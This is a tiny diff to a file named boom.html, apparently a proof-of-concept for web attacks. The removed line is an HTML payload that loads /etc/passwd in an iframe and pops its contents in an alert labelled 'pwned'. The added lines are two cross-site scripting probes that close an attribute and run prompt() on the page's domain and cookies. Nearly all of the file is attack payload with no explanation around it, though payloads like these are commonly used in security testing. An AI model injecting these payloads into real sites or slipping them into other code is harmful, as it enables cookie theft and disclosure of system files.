--- a/boom.html
+++ b/boom.html
@@ -1,1 +1,2 @@
-<br><BR><BR><BR><h1>pwn<br><iframe onload=j() src=\"/etc/passwd\">xssxsxxsxs</iframe><script type=\"text/javascript\">function j(){alert('pwned contents of /etc/passwd:\n\n '+frames[0].document.body.innerText)}</script>
+"><img src=x onerror=prompt(document.domain)>
+"><img src=x onerror=prompt(document.cookie)>
